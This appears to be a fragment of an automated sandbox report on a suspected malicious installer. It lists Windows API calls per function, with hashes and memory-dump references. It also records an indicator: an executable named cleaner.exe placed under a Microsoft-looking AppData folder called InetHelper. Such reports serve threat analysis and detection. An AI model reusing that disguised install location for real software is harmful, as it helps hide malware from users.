                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                              • String ID: (gD${
                                                                                                                                                                                                              • API String ID: 590372296-3503173740
                                                                                                                                                                                                              • Opcode ID: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction ID: c9c6b7b377eba0e4ba3b2f043119a7f49a951143ce35cdb84ba81c9eded025b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9B16A71800608FFDB11AFA0DD89AAE7B79FB48314F10817AFA45B61A0DB744E51DF68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                                                                              • Opcode ID: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                              • Instruction ID: d2f35d8900002cfc25ccfd4abe259465259501dfb46309a939b5c4dc2546952f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45028CB0900609EFEB109F94CD85AAE7BB5FB44314F10817AF615BA2E1C7798E42DF58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00446728,00000000,?,?), ref: 004049B7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"), ref: 004049C3
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00002000,00404A0C), ref: 00405A45
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004366F8,?,?,0000040F,?,004366F8,004366F8,?,00000001,004366F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$(gD$A
                                                                                                                                                                                                              • API String ID: 2624150263-1103393527
                                                                                                                                                                                                              • Opcode ID: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                              • Instruction ID: 9143468ab5d07659f3e28480ae0608f723924ccc95e3ca23e4c22bb38621839a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A161B1900205ABDB11AFA6CD85AAF77B8EF84315F11803BF601B62D1D77C99418F6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                                              • Opcode ID: 96344c3de5cfe15fcb011e91b90de0fab0478ac3d65f8d3cbce9a31fa6ce2af2
                                                                                                                                                                                                              • Instruction ID: 9bf21a461f45ca9ede348bf2f5d3e2a4fdca70f5c54a4bf8f8a9e28148a02939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96344c3de5cfe15fcb011e91b90de0fab0478ac3d65f8d3cbce9a31fa6ce2af2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB414971A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB44
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,?,00446728,00000000), ref: 004041D4
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00446728), ref: 004041E8
                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                              • String ID: (gD
                                                                                                                                                                                                              • API String ID: 184305955-2450699939
                                                                                                                                                                                                              • Opcode ID: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction ID: dffee297adc4390e0108bf821a76a55ee3af39d38e00891df0cde6976b1e4786
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C1B3B1540600EFDB216FA1EE85D2B3BA8EB85706F10053EFB41B11F1CB7998919B5E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • N, xrefs: 004046BA
                                                                                                                                                                                                              • "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", xrefs: 004046FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$N
                                                                                                                                                                                                              • API String ID: 3103080414-3972352568
                                                                                                                                                                                                              • Opcode ID: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction ID: 4cd1da19937af119875355adca30567c2743cec9092c6b5b68c8bc3b1ab06c36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 176181B1900209BFDB109F60DD85EAA7B69FB84354F00853AFB05B72E1DB789D51CB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                              • DrawTextW.USER32(00000000,00468240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                              • Opcode ID: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                              • Instruction ID: 5ab7a9dfb5d1aa1389ec6db6610c78830fc9e5957017c9b4d31100662f95375f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14418C71800209AFCF058F95DE459AF7BB9FF44314F00842EF591AA1A0CB78D954DFA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045EDC8,00000400), ref: 00406078
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045F5C8,00000400), ref: 00406095
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045F5C8,C0000000,00000004,0045F5C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,0045E9C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                                                                                              • Opcode ID: ea336b7c7ee09a778134d66cdc55d59d2776f1992f2862d3dcc69e87973e6afa
                                                                                                                                                                                                              • Instruction ID: a59dba961965db3d83d90a372a5cb94a2ead5b1f2218518f4427fddb9e4ed3d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea336b7c7ee09a778134d66cdc55d59d2776f1992f2862d3dcc69e87973e6afa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F312771200705BBE2206B628D48F573A6CEF45745F15043EFA46FA2C3DA7CD91586AD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                              • String ID: 9
                                                                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                              • lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                              • SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Similarity
